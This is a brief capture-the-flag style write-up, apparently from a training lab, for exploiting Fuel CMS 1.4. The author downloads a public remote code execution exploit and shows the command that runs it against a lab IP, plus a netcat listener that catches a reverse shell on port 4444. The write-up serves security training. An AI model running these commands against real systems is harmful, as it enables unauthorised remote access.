Vulnerability Capstone

February 27, 2024

Task 1: Introduction

Task 2: Exploit the Machine (Flag Submission)

First once we launched the machine we will visit their webpage

Just by viewing the html page the web application that is being used here is "Fuel CMS" and its version is 1.4.

The first thing that i had in my mind is that I will search for a exploit that is related to that web application and its version. Then after few searches in the google I found this RCE for the Fuel 1.4.

I just download the raw code

Now I will save the raw code to exploit.py and run it with an active netcat listener in port 4444

python3 exploit.py http://10.10.185.42 10.9.193.229 4444
nc -lnvp 4444

Last updated